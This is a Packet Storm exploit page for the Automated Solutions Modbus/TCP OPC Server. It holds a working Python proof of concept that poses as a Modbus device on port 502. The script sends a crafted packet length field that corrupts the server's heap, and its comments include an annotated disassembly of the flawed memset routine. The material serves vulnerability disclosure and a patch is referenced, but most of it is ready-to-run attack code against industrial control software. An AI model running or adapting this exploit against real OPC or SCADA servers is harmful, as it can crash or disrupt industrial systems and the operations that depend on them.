exploit the possibilities

Automated Solutions Modbus/TCP OPC Server Heap Corruption

Automated Solutions Modbus/TCP OPC Server Heap Corruption
Posted Jan 25, 2011
Authored by Jeremy Brown

Automated Solutions Modbus/TCP OPC server remote heap corruption proof of concept exploit.

tags | exploit, remote, tcp, proof of concept
MD5 | 8ab74316a0a72aa7090d0e3cbe065899

Automated Solutions Modbus/TCP OPC Server Heap Corruption

Change Mirror Download
#!/usr/bin/python
# asmb-heap.py
# Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# A specially crafted length field in a MODBUS packet header can trigger heap corruption.
#
# 00408312 |> 8B5424 3C MOV EDX,DWORD PTR SS:[ESP+3C] -> move length into edx
# 00408316 |. 53 PUSH EBX -> push src onto stack
# 00408317 |. 8B5C24 3C MOV EBX,DWORD PTR SS:[ESP+3C] -> move dest into ebx
# 0040831B |. 8BCA MOV ECX,EDX -> move length into ecx
# 0040831D |. 55 PUSH EBP -> push ebp onto stack
# 0040831E |. 8BE9 MOV EBP,ECX -> move ecx into ebp
# 00408320 |. 57 PUSH EDI -> push edi onto stack
# 00408321 |. 33C0 XOR EAX,EAX -> eax = 0
# 00408323 |. 8BFB MOV EDI,EBX -> move dest into edi
# 00408325 |. 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX -> move ebx into dword at esp+1c
# 00408329 |. C1E9 02 SHR ECX,2 -> shift ecx right twice
# 0040832C |. F3:AB REP STOS DWORD PTR ES:[EDI] -> fill ecx dwords at edi with eax
#
# So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords
# it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,
# they are NULL. However, we can still write past the bounds of the allocated chunk of memory.
#
# Although it seems unlikely code execution could result, it is still possible to write data
# past the memory allocated on a heap (0x350000) available in the server process.
#
# This code works by setting up a fake channel and accepting a connection. To trigger this
# vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)
# with this fake channel and the results depend on the response you choose.
#
# I tested version 3 running on Windows. Testing the server with this code and its default
# response should't cause the server to crash (immediately anyways). Larger lengths (such as
# the one commented out) may cause the server to crash.
#
# Patch: http://automatedsolutions.com/demos/demoform.asp?code=17
#

import sys
import socket

port=502

# [trans] [prot] [len] [u] [f] [bc] [data]
resp="\x00\x00"+"\x00\x00"+"\x02\x01"+"\x00"+"\x03"+"\x02"+"\x00\x00" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)
#resp="\x00\x00"+"\x00\x00"+"\x02\xb0"+"\x00"+"\x03"+"\x02"+"\x00\x00" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f

try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind(("",port))
sock.listen(1)
conn,addr=sock.accept()

except IOError,e:
print e

print "OPC server at %s connected\n"%addr[0]

req=conn.recv(32)
print "<-- %s"%req.encode("hex")

conn.send(resp)
print "--> %s\n"%resp.encode("hex")
conn.close()

print "finished, check server"
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close